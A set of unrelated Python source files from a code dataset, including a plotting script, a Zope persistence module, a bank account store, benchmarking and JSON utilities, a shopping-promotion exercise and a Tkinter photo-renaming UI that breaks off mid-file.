\\\n\t\t basefile=savenamepdf, adjustgrid=adjustgrid, save=save, normalize=normalize, comments=comments)\n\n\t\t# READ Learning\n\t\tD = DataIO(case, directory=LEARNDIR)\n\t\toutput, metadata = D.readLearningResults(filename)\n\n\t\toutput_vec.append(output)\t\n\t\tmetadata_vec.append(metadata)\n\t\tfilename_vec.append(filename)\n\n\toutput_VEC.append(output_vec)\n\tmetadata_VEC.append(metadata_vec)\n\tfilename_VEC.append(filename_vec)\n\n\n\tprint('files = [')\n\tfor f in filename_vec:\n\t\tprint(\"\\'\"+f+\"\\',\")\n\tprint(']')\n\n\n## PLOT\nA = Analyze()\nsavename = 'advectreact_rfe' + \"_closecomp_\" + LassoType + \"_\" + str(coeforder)\nxlabel = 'RFE Threshold'\nfeature_opt_vec = ['Closure Prob.', 'Full Eqn.']\n\nlinestyles = ['solid', 'dashed', 'dashdot', 'dotted']\nmarker = ['o', 'v', 's', '*']#, '^', '>', '<', 'x', 'D', '1', '.', '2', '3', '4']\nstyles = [[l, m] for l in linestyles for m in marker]\nprint(styles)\nprint(len(styles))\n\n\nfig, ax = plt.subplots(1, 2, figsize=(13, 5.5))\nvariable = rfe_alpha_vec\n\nleg0 = []\nleg1 = []\nfor i, outvec in enumerate(output_VEC):\n\ttrainRMSE, testRMSE = A.getTrainTestDependence(outvec)\n\n\tax[0].plot(variable, testRMSE, linestyle=linestyles[i], linewidth=3, marker='.', markersize=8)\n\tleg0.append(feature_opt_vec[i])\n\n\n\t# Coefficients Dependence Multi\n\tfeatarray, relevant_feats = A.getCoefDependence(outvec, threshold=0.01, invert_sign=True)\n\tfor j in range(len(relevant_feats)):\n\t\tax[1].plot(variable, featarray[:, j], linestyle=styles[i][0], marker=styles[i][1], linewidth=2.5, markersize=7)\n\tleg = ax[1].legend(latexify_varcoef(relevant_feats, cdf=False), bbox_to_anchor=(.98,1), fontsize=14)\n\t\nax[0].set_xlabel(xlabel, fontsize=14)\nax[0].set_ylabel('RMSE', fontsize=14)\nax[0].legend(leg0)\nax[0].set_xscale('log')\n\nax[1].set_xscale('log')\nax[1].grid(color='k', linestyle='--', linewidth=0.5)\nax[1].set_xlabel(xlabel, fontsize=14)\nax[1].set_ylabel('Coefficients', 
fontsize=14)\n\nfig.savefig(FIGDIR+savename+'.pdf')\nplt.show()\n\n\n","sub_path":"code/testcases/advectreact_randadv_rfe_close.py","file_name":"advectreact_randadv_rfe_close.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"523841065","text":"from tr.interfaces import ITRObject, ITRWalker, ITRContentType, ITRObjectChoiceField, ITRObjectListField\nfrom persistent.list import PersistentList\nfrom zope.app.container.btree import BTreeContainer\nfrom zope.app.intid.interfaces import IIntIds\nfrom zope.component import adapts, getUtility\nfrom zope.interface import implements\nfrom zope.security.proxy import removeSecurityProxy\nfrom BTrees.OIBTree import OITreeSet\nfrom zope.schema import getFieldNames\nfrom zope.app.interface import queryType\nfrom ap import interfaces\nfrom zope.app.component.hooks import getSite\nfrom zope.app.component.site import SiteManagerContainer\nfrom zope.app.container.btree import BTreeContainer\nfrom zope.component import provideUtility\nfrom zope.event import notify\nfrom zope.interface import implements\nfrom zope.schema.interfaces import IVocabularyFactory\nfrom zope.schema.vocabulary import SimpleVocabulary, SimpleTerm\n\n\nclass TRObject(BTreeContainer):\n \"\"\" \"\"\"\n implements(ITRObject)\n __lower__ = __upper__ = completed = None\n\n def __init__(self):\n self.completed = OITreeSet()\n self.__lower__ = PersistentList([])\n self.__upper__ = PersistentList([])\n super(TRObject, self).__init__()\n\n\nclass MockField(object):\n implements(ITRObjectListField)\n required = False\n\nclass TRWalker(object):\n \"\"\"\n Extend to the core of 'jc':\n\n If getLowerAttr or getUpperAttr will return\n None - nothing will happen.\n I need that for example, to break the depend.\n When mission is created: it will store vehicle, driver\n and attach.\n BUT! this 3 objects will not will store missions!\n\n missions are huge. in deferred tasks i store task in that\n objects and move tasks to completed (TreeSet).\n\n Instead, i will use index to chain mission and other staff (see indexes.py)\n\n\n \"\"\"\n implements(ITRWalker)\n adapts(ITRObject)\n # .............. name .. type may delete? .......\n upper_attrs = ['__upper__']\n lower_attrs = ['__lower__']\n\n def __init__(self, context):\n self.context = context\n self.intid = getUtility(IIntIds, context=context)\n\n\n def obForSure(self, some):\n \"\"\" just returns object\"\"\"\n if type(some) is int:\n return self.intid.getObject(some)\n if some is None: return PersistentList([])\n return some\n\n\n def listForSure(self, attr):\n if attr is None: return []\n at = removeSecurityProxy(getattr(self.context, attr))\n if at is None: return []\n if type(at) is list or type(at) is PersistentList:\n pass\n elif type(at) is OITreeSet:\n at = [k for k in at.keys()]\n else: at = [at]\n return at\n\n def getObjects(self, attr):\n obs = []\n for o in self.listForSure(attr):\n obs.append(self.obForSure(o))\n return obs\n\n\n # subclusses override this!\n def getUpperAttr(self, ob):\n return '__upper__'\n\n # subclusses override this\n def getLowerAttr(self, ob):\n return '__lower__'\n\n\n\n def getOtherLevel(self, attrs) :\n # this means view call this method. view know nothing about ob\n obs = []\n for a in attrs:\n obs += self.getObjects(a)\n return obs\n\n def getLower(self, ob=None):\n \"\"\"\n MAIN method! 
every body use it!\n pages are use it with ob=None\n append and remove - use ob as indicator to get attr\n \"\"\"\n return self.getOtherLevel(self.lower_attrs)\n\n\n def getUpper(self, ob=None):\n \"\"\"\n MAIN method! every body use it!\n pages are use it with ob=None\n append and remove - use ob as indicator to get attr\n \"\"\"\n return self.getOtherLevel(self.upper_attrs)\n\n\n # def getField(self, ob):\n\n\n def setOtherLevel(self, ob, meth, upper=True):\n \"\"\"\n to do!\n if 'append' - check it list or not? (TRObjectChoice or TRObjectList)\n if list - append, if not just set the object\n if 'remove' - check if it is required or not!\n if required - just do not delete!\n \"\"\"\n if upper:\n attr = self.getUpperAttr(ob)\n else:\n attr = self.getLowerAttr(ob)\n\n # no need!\n if attr is None: return\n\n intrfc = queryType(self.context, ITRContentType)\n field = None\n for n in getFieldNames(intrfc):\n if attr == n:\n field = intrfc[n]\n break\n # i have a specified field or i have None, cause attribute is __lower__ or __upper__\n if field is None:\n field = MockField()\n\n if ITRObjectChoiceField.providedBy(field):\n # treat single element\n if meth == 'append':\n setattr(self.context, attr, ob)\n elif meth == 'remove':\n if not field.required:\n setattr(self.context, attr, None)\n\n elif ITRObjectListField.providedBy(field):\n # treat list\n if meth == 'append':\n to_append = getattr(self.context, attr)\n to_append.append(ob)\n setattr(self.context, attr, to_append)\n elif meth == 'remove':\n to_remove = getattr(self.context, attr)\n if ob in to_remove:\n if field.required and len(to_remove) ==1:\n pass\n else:\n to_remove.remove(ob)\n setattr(self.context, attr, to_remove)\n\n\n def appendUpper(self, ob):\n self.setOtherLevel(ob, 'append')\n\n def removeUpper(self, ob):\n self.setOtherLevel(ob, 'remove')\n\n def appendLower(self, ob):\n self.setOtherLevel(ob, 'append', False)\n\n def removeLower(self, ob):\n self.setOtherLevel(ob, 'remove', False)\n\n\n\n#sys.path.append('/usr/local/Zope-3.4.0/lib/python/')\n#sys.path.append('/home/aganzha/workspace/gt/trunk/gutentag/src/')\n\n\nclass TRContainer(BTreeContainer):\n implements(interfaces.ITRContainer)\n\n\nclass TRSite(SiteManagerContainer, BTreeContainer):\n implements(interfaces.ITRSite)\n def setSiteManager(self, site_manager):\n \"\"\" This method called from object added handler (see handlers)\n Firstly, I install SiteManager\n After: all folders and utilities via firing our custom event\"\"\"\n super(TRSite, self).setSiteManager(site_manager)\n notify(NewTRSiteEvent(self))\n\nclass NewTRSiteEvent(object):\n implements(interfaces.INewTRSiteEvent)\n def __init__(self, site):\n self.object = site\n\ndef get_container_interfaces():\n for key,value in interfaces.__dict__.items():\n if key.find('Container') != -1 and len(key) > len('ITRContainer'):\n yield key, value\n\n\n\ndef make_container_factory(interface):\n def container_from_interface(context=None):\n if context is not None and context.__parent__ is not None:\n site = context\n while not interfaces.ITRSite.providedBy(site):\n site = site.__parent__\n else:\n site = getSite()\n if site is None:\n #fuck! 
during testing i can`t get the site :(\n from ap import tests\n site = tests.site\n container = None\n for v in site.values():\n if interface.providedBy(v):\n container = v\n break\n return container\n return container_from_interface\n\n\ndef getContainerFor(interface):\n if type(interface) == type('string'):\n for k,v in get_container_interfaces():\n if k == interface:\n interface = v\n break\n return make_container_factory(interface)()\n\n\n\ndef make_term(int_ids, x):\n name_chooser = ITRNameChooser(x)\n name = name_chooser.getCleanName()\n return SimpleTerm(x, token=int_ids.getId(x), title=name)\n\n\ndef install_vocabularies():\n \"\"\" so, i`ve just will return the container. Not the vocabulary!\"\"\"\n interfaces = get_container_interfaces()\n interfaces_keys = [k for k,v in get_container_interfaces()]\n def voc_factory(context):\n voc = SimpleVocabulary.fromValues(interfaces_keys)\n return voc\n provideUtility(voc_factory, IVocabularyFactory, u'container interfaces')\n #moc vocabularies, which factory just returns the container factory as IVocabularyFactory\n for k,v in interfaces:\n provideUtility(make_container_factory(v), IVocabularyFactory, k)\n\n\ninstall_vocabularies()\n","sub_path":"persistent.py","file_name":"persistent.py","file_ext":"py","file_size_in_byte":8492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"453273982","text":"from utility import openFile, converttohash\n\n# MIDN 2/C Geary \n# Sets up the AcctStore class, in which all of the data read in from acctfile.dat is stored as an AcctStore object.\n\nclass AcctStore:\n\n _pin = 0\n _bal = 1\n _lock = 2\n\n def __init__(self, filename):\n self._D = {}\t\t\t\t#dict() also works instead of {}\n f = openFile(filename)\n s = f.readline().strip()\n while (s != \"\"):\n L = s.split(\" \")\n acct = L[0]\n pinHash = L[1]\n balance = float(L[2])\n locked = int(L[3])\n self._D[acct] = [pinHash,balance,locked]\n s = f.readline().strip()\n f.close()\n\n def rewrite2File(self,filename):\n f = openFile(filename,\"w\") # uses the openFile function from the utility module, which is also in this directory.\n for k,v in self._D.items():\n L = [k] + v + [\"\\n\"] # create a list of the key, values, and \"\\n\"\n L = list(map(str,L)) # convert all to strings\n s = \" \".join(L)\n f.write(s) # writes the string to the file\n f.close()\n return\n\n def Deposit(self, acct, amt):\n #pre: acct is valid and exists in the store; amt is a positive float number.\n \t\t#post: acct balance is increased by amt\n self._D[acct][self._bal] += amt \n return\n\n def Withdraw(self, acct, amt):\n self._D[acct][self._bal] -= amt\n\n #pre: acct is valid and exists in the store; amt is a positive float number.\n #pre: amt <= acct balance\n \t\t#post: acct balance is decreased by amt\n def GetBalance(self, acct):\n #pre: acct is valid and exists in the store\n \t\t#post: Returns the balance (float) for account\n return float(self._D[acct][self._bal])\n\n def GetHashedPin(self, acct):\n #pre: acct is valid and exists in the store\n #post: Returns a string that is the hashed PIN for acct\n return self._D[acct][self._pin]\n\n def HashAndStorePin(self, acct, clearPIN):\n #pre: acct is valid and exists in the store; clearPIN is a string of four digits\n \t\t#post: Stores the hashed version of clearPIN in the store.\n \t\t#Note: Calls converttohash from utility.py to convert clearPIN to its hashed analog\n self._D[acct][self._pin] = converttohash(clearPIN)\n return\n def FreezeAcct(self, acct):\n #pre: acct 
is valid and exists in the store\n \t\t#post: Freezes the acct\n self._D[acct][self._lock] = 0\n return None\n def UnFreezeAcct(self, acct):\n\t\t #pre: acct is valid and exists in the store\n\t \t#post: Unfreezes the acct\n self._D[acct][self._lock] = 1\n print(\"Account #{0} is now unfrozen!\".format(acct))\n return\n def IsInStore(self, acct):\n #pre: acct is valid\n \t\t#post: Returns true if the acct is in store and false otherwise\n if acct in self._D:\n return True\n else:\n return False\n\n def IsUnlocked(self, acct):\n #pre: acct is valid and exists in the store\n \t\t#post: Returns true if the acct is unlocked and false otherwise\n if self._D[acct][self._lock] == 0:\n return False\n else:\n return True\n return\n","sub_path":"accountstore.py","file_name":"accountstore.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"391749097","text":"def decode(population, x_1, x_2, l1, l2):\n x1_bin = population[:,:5]\n x2_bin = population[:,5:]\n x1_binary = [''.join(row) for row in x1_bin.astype(str).tolist()]\n x2_binary = [''.join(row) for row in x2_bin.astype(str).tolist()]\n d1 = [float(int(row,2)) for row in x1_binary]\n d2 = [float(int(row,2)) for row in x2_binary]\n \n x1=[]\n x2=[]\n [x1.append(min(x_1) + (max(x_1)-min(x_1))*d/pow(2,(l1-1))) for d in d1]\n [x2.append(min(x_2) + (max(x_2)-min(x_2))*d/pow(2,(l2-1))) for d in d2]\n \n return [x1, x2]\n","sub_path":"decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"625498152","text":"import torch\nimport time\nimport concurrent.futures\nimport numpy as np \n\n\ndef benchmark(filename, example, n_models=2, n_threads=2, batches_per_thread=1000):\n \"\"\"\n Record performance statistics for a serialized model and its input example.\n\n Arguments:\n filename: The serialized torchscript model to load for benchmarking.\n example: An example model input.\n n_models: The number of models to load.\n n_threads: The number of simultaneous threads to execute inferences on.\n batches_per_thread: The number of example batches to run per thread.\n\n Returns:\n A dictionary of performance statistics.\n \"\"\"\n\n # Load models\n models = [torch.jit.load(filename) for _ in range(n_models)]\n\n # Warmup\n for _ in range(8):\n for model in models:\n model(*example)\n\n latencies = []\n\n # Thread task\n def task(model):\n for _ in range(batches_per_thread):\n start = time.time()\n model(*example)\n finish = time.time()\n latencies.append((finish - start) * 1000)\n\n # Submit tasks\n begin = time.time()\n with concurrent.futures.ThreadPoolExecutor(max_workers=n_threads) as pool:\n for i in range(n_threads):\n pool.submit(task, models[i % len(models)])\n end = time.time()\n\n # Compute metrics\n boundaries = [50, 95, 99]\n percentiles = {}\n\n for boundary in boundaries:\n name = f'latency_p{boundary}'\n percentiles[name] = np.percentile(latencies, boundary)\n duration = end - begin\n batch_size = 0\n for tensor in example:\n if batch_size == 0:\n batch_size = tensor.shape[0]\n inferences = len(latencies) * batch_size\n throughput = inferences / duration\n\n # Metrics\n metrics = {\n 'filename': str(filename),\n 'batch_size': batch_size,\n 'batches': len(latencies),\n 'inferences': inferences,\n 'threads': n_threads,\n 'models': n_models,\n 'duration': duration,\n 'throughput': throughput,\n **percentiles,\n }\n\n 
display(metrics)\n\n\ndef display(metrics):\n \"\"\"\n Display the metrics produced by `benchmark` function.\n\n Args:\n metrics: A dictionary of performance statistics.\n \"\"\"\n pad = max(map(len, metrics)) + 1\n for key, value in metrics.items():\n\n parts = key.split('_')\n parts = list(map(str.title, parts))\n title = ' '.join(parts) + \":\"\n\n if isinstance(value, float):\n value = f'{value:0.3f}'\n\n print(f'{title :<{pad}} {value}')\n","sub_path":"sagemaker/recommendation/Neural-Collaborative-Filtering-On-SageMaker/2_Trn1_Inf2/src/inf2_util.py","file_name":"inf2_util.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"46029929","text":"\"\"\"\r\n General utilities used throughout codes\r\n\"\"\"\r\nimport json\r\nimport os\r\nimport logging\r\n# from src.settings import *\r\nimport sys\r\nimport math\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\ndef print_json(data):\r\n # pretty prints trips\r\n print(json.dumps(data, sort_keys=True, indent=4))\r\n\r\ndef write_file(data, file, folder):\r\n if not os.path.exists(folder):\r\n os.makedirs(folder)\r\n with open('{}/{}'.format(folder, file), 'w') as save_result:\r\n save_result.write('{}'.format(data))\r\n\r\n\r\ndef load_json(file, input_folder, print_result=False, refactor_keys=False):\r\n # refactor keys: to put keys from strings to ints, common for units.json\r\n # with open('%s/%s.json' % (input_folder, file), 'r') as data_file:\r\n if not file.endswith('.json'):\r\n file += '.json'\r\n with open(os.path.join(input_folder, file), 'r') as data_file:\r\n json_data = json.load(data_file)\r\n if print_result:\r\n print('\\n\\n----> File %s is printed:' % file)\r\n print_json(json_data)\r\n\r\n if refactor_keys:\r\n return {int(id): data for id, data in json_data.items()}\r\n else:\r\n return json_data\r\n\r\n\r\ndef save_json(data, file, folder):\r\n if not os.path.exists(folder):\r\n os.makedirs(folder)\r\n if not file.endswith('.json'):\r\n file += '.json'\r\n with open(os.path.join(folder, file), 'w') as fp:\r\n # json.dump(data, fp, indent=4, encoding='utf-8')\r\n # utf-8 does not work with parse_gebieden @peter\r\n json.dump(data, fp, indent=4, encoding='iso-8859-1')\r\n\r\ndef save_json_less_overhead(data, file, folder):\r\n with open(os.path.join(folder, file), 'w') as fp:\r\n json.dump(data, fp, indent=4, encoding='utf-8')\r\n # utf-8 does not work with parse_gebieden @peter\r\n # json.dump(data, fp, indent=4, encoding='iso-8859-1')\r\n\r\ndef save_non_python_object_to_json(data, file, folder):\r\n # more info: https://pythontips.com/2013/08/08/storing-and-loading-data-with-json/\r\n def jdefault(o):\r\n return o.__dict__\r\n # json.dump expects an open file object, not a path string\r\n with open(os.path.join(folder, file), 'w') as fp:\r\n json.dump(data, fp, indent=4, encoding='utf-8', default=jdefault)\r\n\r\n\r\ndef progress_bar(progress):\r\n \"\"\"\r\n Input your progress like 0.03 and this function converts it to a progress bar output\r\n \"\"\"\r\n sys.stdout.write(\"\\r[%-20s] %d%%\" % ('='*int(math.floor(20 * progress)), 100*progress))\r\n sys.stdout.flush()\r\n","sub_path":"src/utils/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"431806299","text":"\n\n\n\n\n\"\"\"\nVerifies duplicate ldflags are not removed.\n\"\"\"\n\nfrom __future__ import print_function\n\nimport sys\n\ndef CheckContainsFlags(args, substring):\n if args.find(substring) == -1:\n 
print('ERROR: Linker arguments \"%s\" are missing in \"%s\"' % (substring,\n args))\n return False\n return True\n\nif __name__ == '__main__':\n args = \" \".join(sys.argv)\n print(\"args = \" + args)\n if not CheckContainsFlags(args, 'lib1.a -Wl,--no-whole-archive') \\\n or not CheckContainsFlags(args, 'lib2.a -Wl,--no-whole-archive'):\n sys.exit(1)\n sys.exit(0)\n","sub_path":"third_party/python/gyp/test/linux/ldflags-duplicates/check-ldflags.py","file_name":"check-ldflags.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"117637303","text":"'''\r\n13. Refer to the pictures in the folder, simulate shopping at a mall, and write the code\r\n'''\r\nmoney = input('Enter the purchase amount and choose whether to join the promotion: ')\r\nif money.isdigit():\r\n money = int(money)\r\n if money < 50:\r\n print('Your purchase amount this time is too small to join the promotion, bye bye')\r\n else:\r\n while True:\r\n num = int(input('''Join the discount exchange promotion?\r\n1: Spend 50 yuan or more: add 2 yuan to get a small bottle of cola.\r\n2: Spend 100 yuan or more: add 3 yuan to get a large bottle of cola.\r\n3: Spend 100 yuan or more: add 10 yuan to get 5 kg of flour.\r\n4: Spend 200 yuan or more: add 10 yuan to get a pot.\r\n5: Spend 200 yuan or more: add 20 yuan to get a L'Oreal facial cleanser set.\r\n0: No exchange.\r\nPlease choose: '''))\r\n num = int(num)\r\n if money >= 200 and num == 5:\r\n print(\"Total spent this time: {}\\nSuccessfully exchanged for a L'Oreal facial cleanser set\".format(money+20))\r\n break\r\n elif money >=200 and num == 4:\r\n print('Total spent this time: {}\\nSuccessfully exchanged for a pot'.format(money + 10))\r\n break\r\n elif money >= 100 and num == 3:\r\n print('Total spent this time: {}\\nSuccessfully exchanged for 5 kg of flour'.format(money + 10))\r\n break\r\n elif money >= 100 and num == 2:\r\n print('Total spent this time: {}\\nSuccessfully exchanged for a large bottle of cola'.format(money + 3))\r\n break\r\n elif money >= 50 and num == 1:\r\n print('Total spent this time: {}\\nSuccessfully exchanged for a small bottle of cola'.format(money + 2))\r\n break\r\n elif num ==0:\r\n print('Total spent this time: {}\\nWelcome back next time'.format(money))\r\n break\r\n else:\r\n print('This purchase amount does not meet the requirements for the promotion, please choose again')\r\n\r\n\r\nelse:\r\n print('The information you entered is invalid.')","sub_path":"day2_HomeWork/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"350006771","text":"import sys\nimport re\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom tkinter import *\nfrom tkinter.ttk import Frame, Label\nfrom PIL import ImageTk, Image\nimport datetime\nimport jpgcollectinfo\nfrom functools import partial\n\n#EXIF_DB_FILE = \"D:\\\\temp\\\\kepek\\\\exif_db.db\"\n#DEFAULTDIR = \"D:\\\\temp\\\\kepek\\\\\"\n\nEXIF_DB_FILE = \"D:\\\\kepek\\\\2017\\\\201708_Montenegro\\\\exif_db.db\"\nDEFAULTDIR = \"D:\\\\kepek\\\\2017\\\\201708_Montenegro\"\n\n# EXIF_DB_FILE = \"C:\\\\Users\\\\PatrikJelinko\\\\PycharmProjects\\\\jpgrenamer\\\\exif_db.db\"\n# DEFAULTDIR = \"C:\\\\Users\\\\PatrikJelinko\\\\PycharmProjects\\\\kepatnevezo\\\\kepek\\\\\"\n\nCANVAS_WIDTH = 600\nCANVAS_HEIGHT = 400\nCANVAS_BG_COLOUR = 'white'\n\nUI_LEFT = 0\nUI_RIGHT = 1\n# Horizontal SIZE of GRID\nGRID_HSIZE = 5\n\nGOOGLE_RECOMMENDATIONS = 4\n\nclass Publisher:\n # We use the observer pattern. 
notifier is the Subject where\n # observer object register\n def __init__(self, events):\n \"\"\"\n This is the Subject or the central object which others observe\n We call it publisher here\n :param events: list of string for which you can register yourself and a callback\n \"\"\"\n self.observer_subscribers = {event: dict()\n for event in events}\n\n def observer_get_subscribers(self, event):\n \"\"\" Returns the list of observers (subscribers) for a particular event \"\"\"\n return self.observer_subscribers[event]\n\n def observer_register(self, event, who, callback=None):\n \"\"\"\n :param event: Name of the event\n :param who: which instance is registering to this callback\n :param callback: what function to call in case of dispatch, if none is give we will try to call receive_message\n :return:\n \"\"\"\n print(\"registering observer for {}, who {}, for event {}\".format(self, who, event))\n if callback is None:\n callback = getattr(who, 'receive_message')\n self.observer_get_subscribers(event)[who] = callback\n\n print(\"\\nShowing current registrations\")\n for subscriber, callback in self.observer_get_subscribers(event).items():\n print(\"Event:{} Subscriber:{} Callback:{}\".format(event, subscriber, callback))\n\n def observer_unregister(self, event, who):\n \"\"\" Unregisters an observer for an event \"\"\"\n\n del self.observer_get_subscribers(event)[who]\n\n def observer_dispatch(self, sender, event, message):\n \"\"\" Dispatches the message to the observers about an event using the appropriate callback function \"\"\"\n\n for subscriber, callback in self.observer_get_subscribers(event).items():\n if subscriber != sender:\n print(\"Dispatching message from {} to {}\".format(sender, subscriber))\n callback(message)\n else:\n print(\"Not sending message when sender and subscriber are the same\")\n\n\nclass ImageShowUI:\n\n def __init__(self, renameui_instance, pub):\n \"\"\"\n :param renameui_instance: this is our parent object, we use it's variables\n :param pub: publisher we will send our messages to this guy\n \"\"\"\n\n self.processed_tag_list = renameui_instance.processed_tag_list\n self.current_tag = 0\n self.myside=UI_LEFT\n self.current_row = 0\n self.grid_hsize = renameui_instance.grid_hsize\n self.num_recommendations = renameui_instance.num_recommendations\n self.canvas_width = renameui_instance.canvas_width\n self.canvas_height = renameui_instance.canvas_height\n self.canvas_bg_colour = renameui_instance.canvas_bg_colour\n # We use the observer pattern. 
Publisher is the central object\n # which will dispatch messages\n self.publisher = pub\n # Main global frame\n self.img_frame = Frame()\n # Canvas to draw into\n self.img_canvas = Canvas()\n # Picture name\n self.lbl_currentpicname = Label()\n\n # Navi frame\n self.navi_frame = Frame()\n # Google buttons\n self.google_buttons = []\n self.create_widgets()\n\n def create_widgets(self):\n self.create_image_area()\n self.create_pictitle()\n self.create_picture_slider()\n self.create_google_buttons()\n\n def create_image_area(self):\n \"\"\"\n This is simply a canvas we will draw here the image\n :return:\n \"\"\"\n self.img_canvas = Canvas(self.img_frame, width=self.canvas_width, height=self.canvas_height,\n bg=self.canvas_bg_colour)\n self.img_canvas.grid(row=0, column=0, rowspan=1, columnspan=self.grid_hsize, padx=5, pady=5)\n self.current_row = self.current_row + 5\n\n def create_pictitle(self):\n self.lbl_currentpicname = Label(self.img_frame, text=\"currentpicname\")\n self.lbl_currentpicname.grid(column=0, row=self.current_row, columnspan=self.grid_hsize )\n self.current_row = self.current_row + 1\n\n def create_picture_slider(self):\n # Creating next row of UI\n # slider for quick navi\n # next and previous buttons\n\n self.navi_frame = Frame(self.img_frame)\n\n btn_start = Button(self.navi_frame, text=\"|<\", command=self.cb_start, anchor=\"e\")\n btn_left = Button(self.navi_frame, text=\"<<\", command=self.cb_left, anchor=\"e\")\n self.scl_quicknavi = Scale(self.navi_frame, orient=HORIZONTAL, length=300,\n from_=1, to=len(self.processed_tag_list), command=self.cb_quicknavi)\n self.scl_quicknavi.set(self.current_tag)\n btn_right = Button(self.navi_frame, text=\">>\", command=self.cb_right, anchor=\"w\")\n btn_last = Button(self.navi_frame, text=\">|\", command=self.cb_last, anchor=\"w\")\n\n btn_start.grid(row=0, column=0)\n btn_left.grid(row=0, column=1)\n\n self.scl_quicknavi.grid(row=0, column=2)\n btn_right.grid(row=0, column=3)\n btn_last.grid(row=0, column=4)\n self.navi_frame.grid(row=self.current_row, column=0, columnspan=self.grid_hsize, padx=5, pady=5)\n self.current_row += 1\n\n def create_google_buttons(self):\n for i in range(self.num_recommendations):\n btn = Button(self.img_frame, text=\"Google{}\".format(i),\n command=partial(self.cb_btn_google, i))\n btn.grid(row=i + 1, columnspan=self.grid_hsize, sticky=\"NSEW\",)\n self.google_buttons.append(btn)\n\n def set_processed_tag_list(self, processed_tag_list):\n self.processed_tag_list = processed_tag_list\n self.scl_quicknavi[\"to\"] = len(self.processed_tag_list)\n\n def cb_btn_google(self, button):\n print(\"Google button pushed, dispatching message to observer:\", self.google_buttons[button][\"text\"].lstrip())\n self.publisher.observer_dispatch(self, 'google_button_pushed', self.google_buttons[button][\"text\"].lstrip())\n\n def draw_image_to_canvas(self, im):\n self.img_canvas.image = ImageTk.PhotoImage(im)\n self.img_canvas.create_image(0, 0, image=self.img_canvas.image, anchor=\"nw\")\n\n def cb_start(self):\n # print(\"cb start\")\n self.current_tag = 0\n self.im = load_image(self.processed_tag_list[self.current_tag][\"myfilename\"])\n self.draw_image_to_canvas(self.im)\n self.update_all_widgets()\n\n def cb_left(self):\n # print(\"cb left\")\n if self.current_tag > 0:\n self.current_tag -= 1\n self.im = load_image(self.processed_tag_list[self.current_tag][\"myfilename\"])\n self.draw_image_to_canvas(self.im)\n self.update_all_widgets()\n\n def cb_right(self):\n # print(\"cb right\")\n if 
len(self.processed_tag_list) - 1 > self.current_tag:\n self.current_tag += 1\n self.im = load_image(self.processed_tag_list[self.current_tag][\"myfilename\"])\n self.draw_image_to_canvas(self.im)\n self.update_all_widgets()\n\n def cb_last(self):\n # print(\"cb last\")\n if len(self.processed_tag_list) != self.current_tag:\n self.current_tag = len(self.processed_tag_list) - 1\n self.im = load_image(self.processed_tag_list[self.current_tag][\"myfilename\"])\n self.draw_image_to_canvas(self.im)\n self.update_all_widgets()\n\n def cb_quicknavi(self, position):\n if self.current_tag == int(position) - 1:\n # we are at the right position\n pass\n else:\n self.current_tag = int(position) - 1\n try:\n self.publisher.observer_dispatch(self, 'picture_slider_moved',self.current_tag)\n except KeyError:\n print(\"No observer for current object, do nothing\")\n pass\n self.im = load_image(self.processed_tag_list[self.current_tag][\"myfilename\"])\n self.draw_image_to_canvas(self.im)\n self.update_all_widgets()\n # If there is an observer for the slider movement, we have to dispatch a message\n\n def update_all_widgets(self):\n \"\"\"\n Will update all google labels, picture name, slider, settings info\n :return: nothing\n \"\"\"\n\n # Let's get the date of the picture\n try:\n a_date = \" \" + self.processed_tag_list[self.current_tag][\"EXIF DateTimeOriginal\"].printable[:10]\n except KeyError:\n a_date = \"1970:01:01 01:01:01\"\n\n a_date2 = re.sub(\":\", \"\", a_date)\n a_date2 = a_date2 + \"_\"\n\n # Let's update the name of the picture\n self.lbl_currentpicname[\"text\"] = self.processed_tag_list[self.current_tag][\"myfilename\"] + \" \" \\\n + str(self.current_tag + 1) + \" of \" + str(len(self.processed_tag_list))\n\n\n # Try to display the address\n # Can get both Key and Index error\n for i, b in enumerate(self.google_buttons):\n try:\n # print(\"Google{} {}\".format(i, self.processed_tag_list[self.current_tag][\"formatted_address_list\"][i]))\n b[\"text\"] = a_date2 + self.processed_tag_list[self.current_tag][\"formatted_address_list\"][i]\n except (KeyError, IndexError) as e:\n b[\"text\"] = a_date2 + \"\"\n\n # Let's check if we need to move the slider\n if self.scl_quicknavi.get() != self.current_tag+1:\n # Let's move the quick_navi slider to the right location\n # Maybe on a wrong place since can be moved with buttons\n self.scl_quicknavi.set(self.current_tag + 1)\n # We changed slider position, so we need to send an update\n try:\n self.publisher.observer_dispatch(self, 'picture_slider_moved',self.current_tag)\n except KeyError:\n print(\"No observer for current object, do nothing\")\n pass\n\n def observer_picture_slider_moved(self, peers_position):\n \"\"\" If the left picture slider was moved, this call back function repositions the right slider to picture n+1,\n if possible. 
